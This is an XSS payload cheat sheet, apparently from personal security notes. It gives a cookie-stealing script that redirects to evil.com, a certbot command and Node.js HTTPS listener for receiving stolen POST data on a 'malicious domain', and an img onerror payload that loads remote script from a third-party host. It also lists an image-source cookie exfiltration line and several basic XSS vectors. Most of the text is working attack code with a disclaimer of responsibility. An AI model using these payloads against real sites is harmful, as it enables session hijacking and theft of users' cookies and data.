GET
based interception (easiest and best to show Poc):
// XSS cookie stealer POC
var cookie = encodeURIComponent(document.cookie);
var url = 'https://evil.com/index.html/?victim_cookie=' + cookie;
window.location.href = url;
POST
based interception (I am not responsible for what you do with this info):
- Get ssl certitficates for your malicious domain:
sudo certbot certonly --standalone -d domain.tld
- Setup the listener with ssl certificates
const https = require('https');
const fs = require('fs');
// Load the certificate and key
const cert = fs.readFileSync('cert.pem');
const key = fs.readFileSync('privkey.pem');
// Create the HTTPS server
const server = https.createServer({ cert, key }, (req, res) => {
if (req.method === 'POST') {
let data = '';
req.on('data', (chunk) => {
data += chunk;
});
req.on('end', () => {
console.log(`Received data: ${data}`);
res.writeHead(200, { 'Content-Type': 'text/plain' });
res.end('Data received successfully!');
});
} else {
res.writeHead(405, { 'Content-Type': 'text/plain' });
res.end('Method not allowed!');
}
});
// Listen on port 8080
server.listen(8080, () => {
console.log('Server listening on port 8080');
});
- Inject External JavaScript without
<script>
Tag:
<img src=x onerror="var script = document.createElement('script'); script.src = 'https://basedygt.github.io/xss.js'; document.head.appendChild(script);">
- Data Exfiltration through Image Source (when CSP is disabled):
<img src="https://evil.com/?data=" + encodeURIComponent(document.cookie)">
Vulnerable when
- Absence of Content-Security-Policy header in the response
- Presence of Content-Security-Policy header with a value of
default-src
ornone
- CSS-Based XSS:
body { background-image: url('javascript:alert("XSS")'); }
- SVG XSS:
<svg/onload=alert(document.domain)>
- Event Handlers to Execute Payload:
<button onclick="alert('XSS')">Click Me</button>
- JavaScript Protocol Handler:
<a href="javascript:alert('XSS')">Click Me</a>